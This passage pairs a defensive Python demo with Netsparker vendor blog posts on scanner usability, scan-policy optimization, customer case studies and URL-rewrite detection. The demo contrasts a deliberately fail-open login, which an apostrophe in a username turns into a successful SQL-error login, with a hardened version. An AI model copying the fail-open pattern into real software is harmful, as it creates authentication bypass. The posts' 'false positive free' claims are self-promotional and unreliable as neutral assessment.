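def login_fail_secure(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: parameterized query (V5.10) and deny on any error or unknown
    user (V2.6), with a constant-time hash comparison."""
    try:
        row = conn.execute(
            "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
        ).fetchone()
    except sqlite3.Error:
        return False  # any failure in the control denies access
    if row is None:
        # Unknown user: still do the hashing work so timing does not reveal
        # whether the account exists, then deny.
        _hash(password, b"\x00" * 16)
        return False
    return hmac.compare_digest(row[1], _hash(password, row[0]))


if __name__ == "__main__":
    db = make_db()
    # A name containing an apostrophe breaks the string-built query; the
    # fail-open version turns that error into a successful login.
    for user, pw in (("alice", "correct horse"), ("alice", "wrong"), ("o'brien", "x")):
        print(f"{user!r}: fail_open={login_fail_open(db, user, pw)} "
              f"fail_secure={login_fail_secure(db, user, pw)}")
```

The fail-open variant logs in an unknown user and anyone whose name contains an apostrophe, because the SQL error path never revisits the default; this is exactly the class of behaviour a scanner exercising the login with malformed input would surface, and the hardened variant is what V2.6 and V5.10 ask for.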

Utilize Tools to Comply with OWASP ASVS

A web scanner need not be limited to only finding after-the-fact vulnerabilities. Properly utilized, Netsparker can help a development team satisfy even the most advanced requirements of the OWASP Application Security Verification Standard, in almost every category. With a good set of tools and a clever use thereof, being ASVS certified is as simple as point and click.

An Easy to Use Web Application Security Scanner Means More Secure Web Applications


Many have the impression that security software is difficult to use and should be left only to highly trained experts. If you do a quick review of most of the automated web application security scanners available on the market today, you will notice that many have an abundance of options and settings to ensure they can be used in every type of edge case and scenario.

Even though these options might come in handy to 1% of the users, they confuse the typical user and result in non-use, or incorrect use and spurious results. Many software vendors have had to introduce certification programs for their software, as they know that training is required for users to use their software correctly & efficiently. This results in an increase of overall costs via continuous staff training to keep them qualified just to use a tool that is supposed to improve automation and reduce time & money.

Web application security is a highly emotive subject that can keep many developers and admin staff awake at night, but why make it hard to implement? According to recent reports the current paucity of security on most websites and web applications is not a lack of tools or awareness of security threats, but organizations not using the available tools they have at their disposal. However organizations cannot be blamed if they are not using software that is difficult to use, or professional certification is required to use it. This non-use of security software leads to a waste of resources, false alarms and vulnerable web applications, to say the very least.

Organizations do not need software vendors who try to upsell them products that will require more investment and not give them what they actually need. They need a reliable solution. They need an easy to use web vulnerability scanner that will automatically identify vulnerabilities and security flaws in their web applications. A scanner that their staff can use without any training and get results that they can take action on immediately.

Developing an Easy to Use Web Application Security Scanner

Netsparker is a brave & bold company; we thrive on defying the norm. When Netsparker was founded we created quite a stir in the industry with the bold claim of false positive free web security scans. The ‘norm’ before Netsparker was around was ‘It is better to have an extra false positive vulnerability to verify than a false negative!’

Over the years we proved that such a compromise is not necessary and you can have the best of the both worlds. With the built-in exploitation engine of Netsparker you can have results with confirmed web vulnerabilities and findings that are clearly marked as possible issues, thus avoiding all the possible negative impacts false positives have on web application security scans.

And now we are looking forward to defying the norm and raising the bar again in the web application security industry. We are completely focused on developing an even easier to use web application security scanner. By easy to use we do not just mean a very attractive & ergonomic user interface with lots of wizards; we also mean that we should help you automate practically all of the pre- and post-scan tasks. As the research has clearly pointed out: the easier a security tool is to use, the better the adoption rate is amongst organizations, thus making the web a safer place for everyone.

Benefits of Easy to Use Web Application Security Scanner

Improve Productivity and Reduce Costs of Web Application Security

Clearly, this is the most obvious benefit of all; easy to use software costs much less to run and helps improve productivity. Users do not need to be trained or certified and they do not require extensive amounts of time to try and figure out how the tool works. Another great benefit of having an easy to use web application security scanner is that the scanning tasks can be assigned to someone whose role is less technical and in a lower pay grade than a developer, therefore allowing you to let the developers focus on what they do best: writing code and fixing any reported security issues.

Let’s take a look at a practical example: configuring URL rewrite rules in a web application security scanner. Have you ever tried to configure URL rewrite rules in any other scanner apart from Netsparker Desktop or Netsparker Cloud? You need to have access to the web server configuration and analyze it. You also need to know how to write regular expressions. Let’s face it, even though regular expressions are not rocket science, unless you are a developer or use them on a daily basis, writing them can be quite a time consuming process, if not frustrating.

In today’s fast paced world, the user does not need to know the ins and outs of a website or web application to detect vulnerabilities and security issues in it. Nor do they need to know how to write regular expressions or have access to the web server configuration, which might lead to other security issues. Configuring URL rewrite rules should be simple: specify the URL & the parameters and let the scanner automate the URL rewrite configuration for you, as it is in Netsparker.

But we at Netsparker are not settling for just this. We love a new challenge and we are going a step further. Currently, we are working on a new feature for both Netsparker Desktop and our online web application security scanner Netsparker Cloud that will automatically detect URL Rewrite rules for crawling and attacking purposes. Therefore there is nothing that the user needs to do. Of course we will still allow the geeky users to configure their own rules should they want to, but we are further simplifying the process without losing any of the product's capabilities.

More Accurate Web Vulnerability Scans and More Secure Websites and Web Applications

Garbage in, garbage out. If you are not familiar with this term, it means that if you feed garbage to a computer it will produce garbage since it operates by logical processes. The same applies to a web application security scanner. If it is difficult to configure, users will not configure it correctly and it will produce incorrect scan results. This means it will fail to scan the website properly, report a lot of false positives and miss genuine vulnerabilities.

Web Application Security Automation Made Easy

Automation and easy to use security software is definitely the way forward if we would like to see more organizations adopt our solutions and develop more secure websites and web applications. As we have clearly shown, there is no need to limit any of the product’s capabilities in order to deliver a user friendly product. In fact both the desktop and online editions of our automated web application security scanners are fully blown scanners, and every automated process can be overridden and configured manually. However, we have found that only a minority need such fully configurable scanners, and we are happy to cater for them. The generic user base, though, needs easy to use tools. After all, they want to scan web applications and identify vulnerabilities, not fly rockets to the moon, unless of course they work for NASA, in which case, Cool!

2015 - How Does Netsparker Compare with other Automated Web Application Security Scanners?


Prospects frequently ask us how Netsparker web application security scanners compare to competitor scanners. This type of due diligence is part of any procurement or investment in new, or additional, technology. I wouldn’t fork out a few thousand without doing my homework.

There are many factors you should look into when comparing automated web security tools as explained in How to evaluate web application security scanners, but I won’t go into all of that. In this post I will look specifically into the scanning engine’s capability, which is the most important component of the scanner. If that does not work properly, then all the other frills are worthless.

2013 and 2014 Web Security Scanners Comparison

Looking back at the independent web application security scanner comparison done by Shay Chen (@sectooladdict) in 2013 and 2014, Netsparker outperformed all competitors except one, taking overall second place. We would have taken first place, and equalled the performance of a scanner that costs at least three times as much, if it wasn’t for a weird bug which we fixed within a few minutes. Tough luck? Not much. Motivated? Yes. Such results motivate us to work even harder and continue improving both the desktop and the online web application security scanner, and keep us striving to be number one.

How Do Netsparker Scanners Compare with Other Scanners in 2015?

A few weeks back Shay Chen updated the results using the latest version of the Netsparker scanning engine, which is used in both Netsparker Cloud and Netsparker Desktop web security scanner. Below are the results:

Netsparker scanners detected all direct impact vulnerabilities

Direct Impact Vulnerabilities

Netsparker detected all the SQL Injections, reflected Cross-site Scripting, Local File Inclusions and Remote File Inclusions vulnerabilities without reporting any false positives. These vulnerabilities are all direct impact vulnerabilities and are the most commonly exploited ones during an attack.

Old Backup Files Detection - Non Direct Impact Vulnerability

We also improved the backup files detection rate of the Netsparker scanners. Last year Acunetix led this security check with 32.61%, and this year we identified 72.83%. Pretty good job there!

Why Does Netsparker Focus More on Direct Impact Vulnerabilities?

After the web application security scanners comparison of 2014, we continued working on improving the scanning engine. These improvements always focus more on direct impact vulnerabilities such as Cross-site scripting, SQL Injection, DOM XSS etc.

The reason behind such a decision is very simple: if malicious hackers identify a direct impact vulnerability in your web application they can exploit it within minutes, which leads to a hacked website, loss of records, tampering of data etc. For example, by exploiting a SQL injection vulnerability malicious attackers can gain unauthorized access to the web application’s database, which typically contains sensitive information about your business and customers. They can also tamper with or delete such data. In the case of a cross-site scripting vulnerability, the attackers can hijack your users’ sessions, where typically the administrator is targeted.

On the other hand, even though old backup files can contain juicy information for attackers, most of the time they do not contain enough information to craft an attack. Also, such files can be easily identified during a quick manual analysis. For example, if you do a recursive file and directory listing of your web application you can easily spot such files within a minute or so.

We are not saying these types of possible security flaws are of less importance and less of a focus for Netsparker. On the contrary, we in fact outperformed every other scanner in 2014 when measured against this performance metric, and Netsparker detects a wide range of web application vulnerabilities. However, our main focus will always be to help users identify all sorts of direct impact web application vulnerabilities, those which are very difficult to find manually, or those that are time consuming.

How Useful Are Web Security Scanner Comparisons?

At Netsparker we always say that the best way to test a web application security scanner is to scan a staging copy of your web applications as explained in How to evaluate web application security scanners. It is important to scan a staging copy of your own web applications because each web application has individual characteristics, therefore each scanner can report different results. Every developer has his own way of writing code and every administrator has his own way of configuring servers and web applications, so nothing beats a scan of your own web applications.

Though because it is virtually impossible to test all scanners available on the market today, these comparisons are incredibly useful and highlight which scanners are the market leaders, i.e. the ones that can detect the most vulnerabilities. And when looking for a scanner, that is what you are looking for: automating the process of identifying all possible web application vulnerabilities. Therefore, if you would like to test web application security scanners (or, as they are also called, web vulnerability scanners), choose the top three from such lists and get your hands dirty.


Automatically Optimize Scan Policies for More Efficient and Speedy Scans


We have been working on the upcoming versions of Netsparker Desktop and Netsparker Cloud web application security scanners for some time now, and finally, the new features are taking shape. One of the new features I’d like to speak to you about today is the Scan Policy Optimizer.

What is the Scan Policy Optimizer?

The Scan Policy Optimizer is a wizard based optimizer that allows you to optimize Netsparker’s scan policies automatically.

Why Optimize Web Security Scan Policies?

Most modern custom built web applications are quite extensive in terms of functionality, so it can take an automated web application security scanner a considerable amount of time to scan them. There are many things you can do as a user to reduce the duration of an automated web security scan, such as optimizing the web scanner’s scan policy.

Automated Optimization of Web Security Scan Policies

Even though optimized scan policies mean more efficient and speedy web security scans, many of us do not have the time to go through all the checks and determine which ones should be enabled or not during a specific scan, or we are too lazy to do it. So our automation obsessed gurus thought of automating most of the process via a simple wizard. Below you can find the procedures on how to

How to Optimize Scan Policies in Netsparker Desktop

1. Launch the Scan Optimizer Wizard

You can launch the Scan Policy Optimizer wizard by clicking the magic wand button next to the Scan Policy drop down menu in the Start a New Scan dialog. You can also launch the Scan Policy Optimizer from the Scan Policy Editor.

You can launch the Scan Policy Optimizer wizard from the Start a New Scan dialog

2. Select Operating System

Tick the operating system on which the target web application is running.

Select the operating system of the target web server

3. Select Web Server Software

Tick the web server software the target web application is running on.

Note: If the target web application is running on web server software that is not listed here, Netsparker can still scan it. If a web server software is not listed it just means that there are no specific security checks for it, and you can untick all web servers.

Select the web server software the target server is running

4. Select Application Server / Web Technology

Tick the application server the target web application is built on. If it is built using multiple application servers, tick all that apply.

Note: If the target web application is built with a web technology that is not listed here, Netsparker can still scan it. If a web technology is not listed it just means that there are no specific security checks for it and you can untick all application servers.

Select the web technology the target web application is built with

5. Select Database Server

Tick the database server the target web application is using. If multiple database servers are being used tick all that apply.

Note: If the target web application is using a database server that is not listed here, Netsparker can still scan it. If a database server is not listed it just means that there are no specific security checks for it and you can untick all application servers.

Select the database server type running on the target web server

6. Configure Netsparker Resource Finder

In this step you can limit or disable the Resource Finder, which is a module that is used to guess not linked or hidden directories and other type of resources, such as old backup files. To disable the Resource Finder simply untick the option Enable Resource Finder. Alternatively you can limit the number of resources to look for in every folder from the Limit input field.

Configuring the resource finder in the Scan Policy Optimizer wizard

7. Configure Known Web Application Fingerprinting

Netsparker web application security scanners have a known web application fingerprinting module that is used to identify off the shelf web applications such as WordPress and Drupal. If it detects such a web application it will launch a number of specific security checks. If the target web application you are scanning does not have any such web applications installed you can safely disable the option Enable Web App Fingerprint.

8. Review the New Optimized Scan Policy

In the last step you can review all of the configured options. Should you need to make further changes use the Back button to navigate back to that option. Once ready name the scan policy and click Finish to save and use the scan policy during a web application security scan.

Summary of the configured scan policy

How to Optimize Scan Policies in Netsparker Cloud

1. Launch the Scan Policy Optimizer Wizard

You can launch the Scan Policy Optimizer wizard in Netsparker Cloud from two different locations: from the Optimized Policies node in the Policies left hand side bar menu, or by clicking the New Optimized Scan Policy button in the Scan Policies page as shown in the screenshot below.

2. Select Operating System

Tick the operating system on which the target web application is running.

Select the operating system the target web server is running on

3. Select Web Server Software

Tick the web server software the target web application is running on.

Note: If the target web application is running on web server software that is not listed here, Netsparker can still scan it. If a web server software is not listed it just means that there are no specific security checks for it, and you can untick all web servers.

Select the web server software the target is running

4. Select Application Server / Web Technology

Tick the application server the target web application is built on. If it is built using multiple application servers, tick all that apply.

Note: If the target web application is built with a web technology that is not listed here, Netsparker can still scan it. If a web technology is not listed it just means that there are no specific security checks for it and you can untick all application servers.

Select the web technology that the target web application is built on

5. Select Database Server

Tick the database server the target web application is using. If multiple database servers are being used tick all that apply.

Note: If the target web application is using a database server that is not listed here, Netsparker can still scan it. If a database server is not listed it just means that there are no specific security checks for it and you can untick all application servers.

Select the type of database server running on the target web server

6. Configure Netsparker Resource Finder

In this step you can limit or disable the Resource Finder, which is a module that is used to guess not linked or hidden directories and other type of resources, such as old backup files. To disable the Resource Finder simply untick the option Enable Resource Finder. Alternatively you can limit the number of resources to look for in every folder from the Limit input field.

Configure the resource finder in Netsparker Cloud

7. Configure Known Web Application Fingerprinting

Netsparker web application security scanners have a known web application fingerprinting module that is used to identify off the shelf web applications such as WordPress and Drupal. If it detects such a web application it will launch a number of specific security checks. If the target web application you are scanning does not have any such web applications installed you can safely disable the option Enable Web App Fingerprint.

8. Review the New Optimized Scan Policy

In the last step you can review all of the configured options. Should you need to make further changes use the Back button to navigate back to that option. Once ready name the scan policy and click Finish to save and use the scan policy during an online web application security scan.

Optimized scan policy summary in Netsparker Cloud

Netsparker Sponsoring and Exhibiting at JampaSec 2015 in Brazil


Netsparker will be sponsoring and exhibiting Netsparker Desktop and Netsparker Cloud web application security scanners at the JampaSec conference in Brazil.

Netsparker Cloud is Netsparker's newest product. It is a false positive free online web application security scanner and is specifically designed to help enterprises automate most of the pre- and post-scan tasks to ensure the long term security of their websites and web applications.

JampaSec 2015 is an Information Security Conference that will happen between October 2nd and 3rd in João Pessoa, Paraíba. The conference will have speakers from all over Brazil and will cover trending topics in Information Security. Focused on Security Professionals, System Admins, IT Managers and students as well, the conference is organized by Katana Security and sponsored by Netsparker and OWASP. It also has the support from the OWASP Paraíba Chapter and Faculdade Estácio. For more information visit the JampaSec 2015 official website.

How Do You Ensure the Security of Your Websites and Web Applications?

We would like to help you keep your websites and web applications secure so head over to our booth and speak to us. We would be more than happy to have a chat with you or answer any questions you might have. Feel free to stop by, even just to say hello.


Netsparker Sponsoring and Exhibiting at Hacktrick Security Conference


Netsparker is sponsoring and exhibiting at the Hacktrick conference in Turkey. The conference will be held between the 6th and 8th of September at Sabanci University in Istanbul. The three day conference will include a number of seminars, courses, trainings, and CTF contests.

Visit the Netsparker Booth - See How Netsparker Web Security Scanners Can Help Your Business

If you will be at the Hacktrick conference, come and speak to us to see how Netsparker web application security scanning solutions can help you ensure the long term security of all your websites and web applications. We would be more than happy to answer any questions you might have and show you how easy it is to find vulnerabilities with Netsparker Desktop & Netsparker Cloud. We can also get you started with a full trial to see how many vulnerabilities and security flaws the Netsparker web application security scanners can identify on your websites.

So don’t forget to visit the Netsparker booth while at Hacktrick conference, even just to say hello. We look forward to meeting you there. For more information on the conference visit the Hacktrick conference website.

World Renowned Leader in the Human Genome Project Relies on Netsparker to Protect Their Data & Reputation


"Netsparker has meant deployment of new and updated code can be put into production more easily and with greater confidence as to its robustness" - Dr Paul Bevan, Head of Core Software Services at Wellcome Trust Sanger Institute

The Wellcome Trust Sanger Institute is a charitably funded genomic research centre and a leader in the Human Genome Project. They have been using the Netsparker web application security scanner to scan web applications and identify vulnerabilities in them for over three years.

Due to the nature of their research, which is focused on understanding the role of genetics in health and disease that have an impact on health globally, the Sanger Institute aims to provide results that can be translated into diagnostics, or treatments & therapies that reduce global health burdens.

Web applications enabled the Wellcome Trust Sanger Institute to deliver the results of their research to researchers and pharmaceutical companies more easily and efficiently. However, web applications are also susceptible to malicious hack attacks should they be vulnerable, hence the institute needed to ensure the security of their web applications and the integrity of their data.

The evolution from Manual testing to using an Automated Web Application Security Scanner

Prior to using the Netsparker web application security scanner, the Sanger Institute did not use any other web security products. They would manually test their web applications for the most common vulnerabilities and flaws, mainly focusing on the two most common ones: cross-site scripting and SQL injection vulnerabilities. There are many other web application vulnerabilities one should check for, but manual security testing took a considerable amount of time, money and resources, hence it was limited.

Therefore Wellcome Trust Sanger Institute required a new, ideally automated solution that could replace their current manual web security testing procedures. They were looking for a new automated solution that could help them automatically find vulnerabilities and security flaws in their web applications without having to spend too much time, money and resources.

Why Did the Wellcome Trust Sanger Institute Choose Netsparker?

The decision by the Wellcome Trust Sanger Institute to use Netsparker was based on their requirement for a product that could manage a broad spectrum of web security scans and tests. They also required a web vulnerability scanner that was easy to use and could identify the majority of web vulnerabilities so that they could be patched ahead of time, thus mitigating the risk of being hacked.

The Wellcome Trust Sanger Institute uses the Netsparker web application security scanner to scan multiple websites and web application updates prior to releasing them in live environments. The 20+ websites that the Sanger Institute owns are built using a variety of web technologies, such as Java, Perl, Ruby and PHP, and run on Apache and Tomcat web servers.

“We have been scanning our web application updates prior to implementing them in our live environment for quite a while and would recommend everyone to do so,” said Dr Bevan. “You’d be quite surprised how many vulnerabilities can be found during such stages of development.” Netsparker found several XSS and SQL injection vulnerabilities during these regular scans. Should such vulnerabilities have made it to the live deployment, they could easily have been found and exploited in an attack.

Protecting Valuable Data and Reputation

When asked by Netsparker what kind of damage they would endure if they had been hacked, the Head of Core Software Services at the Wellcome Trust Sanger Institute said: "It would be mainly reputational damage since most of the software and data produced by the Sanger Institute is made freely available to researchers and pharmaceutical companies. Other forms of damage would be tampered data and the time & manpower spent understanding how we had been hacked, and reinstalling software on clean, rebuilt, hosts."

More about the Wellcome Trust Sanger Institute

The Wellcome Trust Sanger Institute is a charitably funded genomic research centre located in Hinxton, nine miles south of Cambridge in the UK.

A leader in the Human Genome Project, we are now focused on understanding the role of genetics in health and disease. Our passion for discovery drives our quest to uncover the basis of genetic and infectious disease. We aim to provide results that can be translated into diagnostics, treatments or therapies that reduce global health burdens.

About Netsparker

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false-positive-free web application security scanners Netsparker Desktop and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry, which is reflected in their products. Founded in 2009, Netsparker’s automated web vulnerability scanners are leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank, Skype and Ernst & Young.

How to Scan Multiple Websites Simultaneously with Netsparker Desktop

To scan multiple websites and web applications at the same time with Netsparker Desktop, simply start multiple instances of Netsparker Desktop. For example, if you already have one instance of Netsparker Desktop scanning a website and would like to scan another three websites, launch three new instances of Netsparker Desktop from the Windows Start menu.

Screenshot: Running multiple instances of the Netsparker Desktop web application security scanner.

Concurrent Scans and Instances Are Not Limited

Netsparker does not limit the number of simultaneous web application security scans or concurrent instances you can run of Netsparker Desktop. The maximum number of simultaneous scans is only limited by your hardware resources.

Each running instance of Netsparker Desktop will consume resources during a web security scan. Therefore before running another instance of the web vulnerability scanner make sure you have enough free resources to run it.

Too Many Websites to Scan?

If you have too many websites to scan, we recommend you try Netsparker Cloud. Our scalable online web application security scanner is specifically tailored to help organizations scan hundreds or thousands of web applications, automate post-scan tasks and ensure their long term security.

Leading by Example – T4G Uses Netsparker to Scan Their Own and Client’s Websites

“The decision to use Netsparker for website and web application vulnerability scanning was due to the large library of scan settings available to choose from. This choice of scans produced easy to understand definitions of the threats that were found. Netsparker also provided solutions to the identified threats,” said Steve Charlton, T4G’s Quality Assurance Specialist.

T4G is an IT consulting firm with expertise in analytics, managed services, retail planning and digital marketing. T4G also designs, develops and deploys technology solutions that help its customers run their businesses, and has been using the Netsparker web application security scanner since early 2014.

Automatically Finding Vulnerabilities in Their Custom Web Applications

T4G started using Netsparker to automatically find vulnerabilities and security flaws on their own websites and custom web applications. It all worked very well for them; Netsparker helped uncover some vulnerabilities during the early stages of development, before an update or a web application is used in a live environment.

Scanning Customers’ Web Applications with the Netsparker Web Security Scanner

Like any other business, T4G wants to deliver the best service to its customers. Since Netsparker worked well for them, they introduced automated web application security scanning with Netsparker into their Harmonized Threat and Risk Assessment audit, with which T4G helps its customers ensure the long-term security of their websites and web applications. They use the Netsparker web application security scanner to scan their customers’ websites and web applications.

“We didn’t think twice about including Netsparker security scans in our audit services, it was simply the best option for our clients. In short, Netsparker provides value to a security oriented client,” said Steve Charlton, T4G’s QA Specialist.

Scanning A Wide Variety of Web Applications and Web Technologies

T4G has customers from a number of different industry verticals, such as retail, hospitality, energy, finance and also government agencies. Even though the majority of the websites they scan are built on Java and run on Apache, with such a varied customer base T4G scans every type of web application and web technology. Their engineers have seen it all.

Identifying Vulnerabilities in Web Applications Before Deployment

Automated web security and vulnerability scanning has evolved in the last few years. Nowadays it is not just about scanning a web application before it is deployed in a live environment; one also has to ensure that security is considered, and that the code is secure, during the early stages of development. If security is not considered during the early stages of development, it might be too expensive, or sometimes even impossible, to fix a security flaw at a later stage.

Following security best practices, T4G is proof that automated scans are indeed needed at different and early stages of development. In fact, it is not the first time that Netsparker has identified significant vulnerabilities during a routine web security scan of web applications that are still being developed.

About T4G

T4G brings together expertise in Analytics, Managed Services, Retail Planning, Digital Marketing and Custom Applications. T4G designs, develops and deploys technology solutions that help customers run their businesses better.

T4G's self-directed project teams enable people to create, solve and lead using a unique mix of technology, design and analytics to bring value to customers.

About Netsparker Web Application Security Scanner

Netsparker Web Application Security Scanner is an industry leading automated web application security scanner developed by Netsparker Ltd. Netsparker management and engineers have more than a decade of experience in the web application security industry, which is reflected in their product. Netsparker is a very easy to use web application security scanner that automates most of the web application security scanning. An out of the box installation of Netsparker is able to scan a wide variety of web applications, so web security experts, penetration testers and QA engineers do not need to spend countless hours tweaking and configuring the software. Netsparker is revolutionising web application security by being the only web application security scanner to automatically verify detected web vulnerabilities, thus reporting no false positives. Netsparker is used by world renowned companies such as Samsung, NASA, Skype, ING, ISACA and Ernst & Young.

Automatic Configuration of URL Rewrite Rules in Netsparker Web Application Security Scanners

URL rewriting in web applications is one big headache for both automated web security scanners and their users. If you scan a website that uses URL rewrite technology and do not configure URL rewrite rules in your scanner, the parameters in URLs won’t be scanned. And if such parameters are vulnerable the scanner won’t report such vulnerabilities, leaving them open to potential exploitation.

Failing to configure URL rewrite rules in scanners also means that the web security scan might take forever to finish. Some scanners will even report false positives and go haywire if you don’t configure URL rewrite rules, yet many users still do not configure them. So we automated the whole process of configuring URL rewrite rules in our web security scanners.

This blog post gives an insight into how this new automated technology, which will be introduced in the upcoming versions of both Netsparker Desktop and Netsparker Cloud, will work. It also explains why we automated the process of configuring URL rewrite rules in our web application security scanners.

Addressing the Problem of Configuring URL Rewrite Rules in Automated Web Security Scanners

Many users fail to configure URL rewrite rules in their automated security scanners because in most software they are very difficult to configure. Most of the time you need to have access to the web server’s configuration files, and you need to know how to write regular expressions. As always, we wanted to automate as much of this process as possible, so users can scan all of a website’s parameters without getting bogged down in configuring their web security scanner.

Manually Configuring URL Rewrite Rules in Netsparker Is Easy

To configure URL rewrite rules in both Netsparker Desktop and Netsparker Cloud you do not need to have any information on how the web server is configured, and you do not need to know how to write regular expressions. All you need to do is use the URL rewrite rules wizard to specify the parameter name and type, the rest is all automated.

Even with such a wizard in place, many users still do not configure URL rewrite rules. Most users just want to launch a web security scan and get a report with all the vulnerabilities to fix. Only a very few really go into the detail of configuring the different aspects of a web security scan. So, as usual, we thought of automating the process of configuring URL rewrite rules while still allowing the old school geeks to configure their own rules.

Limitations of the Existing URL Rewrite Rules Configuration

To understand how this new technology works, first you have to understand the limitations of the existing solution. At the moment Netsparker users can select one of the below options when scanning a web application which has URL rewrite enabled:

Use Heuristic URL Rewrite Support

When this option is selected, the scanner tries to automatically determine whether URL rewrite technology is used on the target website, and if it is, the scan is limited. For example, if during a scan the scanner detects the directory structure below, it will stop after a number of tries to avoid going into a loop:

http://www.example.com/users/1

http://www.example.com/users/2

http://www.example.com/users/3

This solution has a number of limitations. First of all, the scanner will not scan the parameters in the URLs, and it only recognizes numeric parameters, such as the ones in the example above.

Use Custom URL Rewrite Rules

When this option is enabled, you have to configure URL rewrite rules in the Netsparker scanners so that the scanner can scan all the parameters in the URLs. Even though this is a very easy solution compared to the configuration of other scanners, users still need some basic knowledge of the link structure of the target website, so manual configuration is involved. And as you might have noticed by now, manual configuration is in Netsparker’s bad books.

Automatic Detection and Configuration of URL Rewrite Rule of Target Websites and Web Applications

To automate the configuration of URL rewrite rules we improved the Heuristic URL Rewrite engine. So if you want to scan a website or web application that has URL rewriting enabled, you can either configure the URL rewrite rules manually or select the option Use Heuristic URL Rewrite Support.

Screenshot: Heuristic URL Rewrite Rules configuration in Netsparker Desktop

Screenshot: Heuristic URL Rewrite Rules configuration in Netsparker Cloud

By default, when Netsparker Desktop or Netsparker Cloud crawl more than 60 URLs that have the same pattern, they automatically create a custom URL rewrite rule and scan the parameters in the URLs. Below is a list of the different types of parameters that Netsparker can automatically identify:

String Parameters
Example URL: http://www.example.com/user/robert
Pattern: /user/{param1}

Numeric Parameters
Example URL: http://www.example.com/userid/1
Pattern: /userid/{param1}

Parameters with Prefixes
Example URL: http://www.example.com/users/user_robert/
Pattern: /users/user_{param1}

Parameters with Suffixes
Example URL: http://www.example.com/users/robert_user/
Pattern: /users/{param1}_user

Multiple Parameters in Same URL
Example URL: http://www.example.com/users/123/robert/
Pattern: /users/{param1}/{param2}

Slug Based Parameters
Example URL: http://www.example.com/blog/pci-dss-good-bad-insecure/
Pattern: /blog/{param1}

Fine Tuning the Automatic Detection and Configuration of URL Rewrite Rules

As seen in the above screenshots, the Netsparker scanners have four new settings in the Heuristic URL Rewrite Support configuration. These settings can be used to fine tune the automated detection and configuration of URL rewrite rules, and below is an explanation of what each setting is used for.

Note: The default settings work well in most of the cases and should only be changed should you notice any performance issues.

Maximum Dynamic Signatures

Use this option to specify how many URLs Netsparker should crawl before it determines that URL rewrite rules are needed to scan the target website. The scanners determine if URL rewrite rules are needed or not by analyzing the patterns of the crawled URLs.

If there are more than 60 URLs (the default value) that have a similar pattern, for example http://www.example.com/category/[x], then the scanners will automatically create the necessary URL rewrite rules to crawl the website and scan the parameters in the URLs.

Block Analyze Threshold

Use this option to specify the number of URLs Netsparker should crawl before checking if any of the crawled URLs have a matching pattern. Therefore if the configured value is 20 (default), each time Netsparker crawls 20 URLs it will check if there are 60 (configured in the option Maximum Dynamic Signatures) of the crawled URLs that have a matching pattern.

The process of checking whether URL rewrite rules are needed is very expensive in terms of resources, which is why it is only done every so often.

Block Merge Threshold

Use this setting to specify the number of URLs with a matching pattern but different parameter values that Netsparker should crawl before merging them together. For example, suppose Netsparker crawls the following URLs:

/category1/page1 -> /category1/page30

/category2/page31 -> /category2/page60

In such a case the Netsparker URL rewrite analysis engine splits the crawled URLs into the following 4 blocks:

Screenshot: List of URLs split into blocks by the Netsparker URL rewrite engine

Since there are 60 pages which have a matching URL pattern (page1 -> page60), but they have a different parameter name in the URL (category1 and category2) Netsparker merges the two blocks of URLs and creates a URL rewrite rule for these pages, such as /category1/{param1}.

This also applies to the category parameter. Therefore if Netsparker crawls more than 60 different category URLs, for example /category1/... -> /category60/..., it will also merge those blocks of URLs and create a URL rewrite rule for them, such as /{param1}/{param2}/.

Block Separators

Use this option to specify the characters used on the target website to separate the blocks in a URL. The default list has the following characters: / _ $ . , ; | :

Therefore, when using the default list, the scanner will split a crawled URL such as http://www.example.com/user/robert_abela into 6 blocks, as highlighted in the screenshot below.

Screenshot: A URL split into blocks by the Netsparker heuristic URL rewrite rules engine
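The heuristic described above, from the parameter types listed earlier through the Maximum Dynamic Signatures threshold and the block separators, as an added Python model that is not Netsparker's own code: it splits crawled URL paths into blocks on the default separator list, groups URLs that share the same skeleton, and replaces a block position with a {paramN} placeholder once the threshold of distinct values is reached there. The crawl results are constructed, only the path (not the host) is analysed, and the Block Analyze and Block Merge thresholds are not modelled.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Block separators the post lists as Netsparker's defaults.
BLOCK_SEPARATORS = "/_$.,;|:"
_TOKEN_RE = re.compile("([" + re.escape(BLOCK_SEPARATORS) + "])")


def tokenize(url):
    """Split a URL path into alternating separator and block tokens, e.g.
    '/users/user_robert/' -> ['/', 'users', '/', 'user', '_', 'robert', '/'].
    Assumption: only the path is analysed (the post's example also splits the host)."""
    return [t for t in _TOKEN_RE.split(urlparse(url).path) if t]


def shape(tokens):
    """Skeleton of a URL: separators kept, every block replaced by '*'.
    URLs sharing a shape are candidates for the same rewrite rule."""
    return tuple(t if _TOKEN_RE.fullmatch(t) else "*" for t in tokens)


def infer_rules(urls, max_dynamic_signatures=60):
    """Simplified model of the heuristic: group crawled URLs by shape, then treat a
    block position as a parameter once at least `max_dynamic_signatures` distinct
    values (the post's default is 60) were seen there. Positions that stay below
    the threshold are kept literally, so category1 and category2 each get a rule."""
    groups = defaultdict(list)
    for url in urls:
        toks = tokenize(url)
        groups[shape(toks)].append(toks)
    rules = set()
    for shp, members in groups.items():
        dynamic = {
            i for i, t in enumerate(shp)
            if t == "*" and len({m[i] for m in members}) >= max_dynamic_signatures
        }
        if not dynamic:
            continue  # nothing varies enough: these are plain static pages
        for toks in members:
            out, n = [], 0
            for i, t in enumerate(toks):
                if i in dynamic:
                    n += 1
                    t = "{param%d}" % n
                out.append(t)
            rules.add("".join(out))
    return sorted(rules)


# Constructed crawl results mirroring the post's examples (not real scan data).
CRAWLED = (
    [f"http://www.example.com/userid/{i}" for i in range(1, 61)]            # numeric
    + [f"http://www.example.com/users/user_{i}/" for i in range(1, 61)]     # prefix
    + [f"http://www.example.com/category1/page{p}" for p in range(1, 31)]   # merge example
    + [f"http://www.example.com/category2/page{p}" for p in range(31, 61)]
    + [f"http://www.example.com/blog/post-{i}-slug/" for i in range(5)]     # below threshold
    + ["http://www.example.com/about", "http://www.example.com/contact"]
)

if __name__ == "__main__":
    for rule in infer_rules(CRAWLED):
        print(rule)
    # Lowering the threshold lets the five blog slugs qualify as well.
    print(infer_rules(CRAWLED, max_dynamic_signatures=5))
```

With the default threshold the five blog slugs produce no rule, which is exactly the behaviour the Maximum Dynamic Signatures setting controls.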

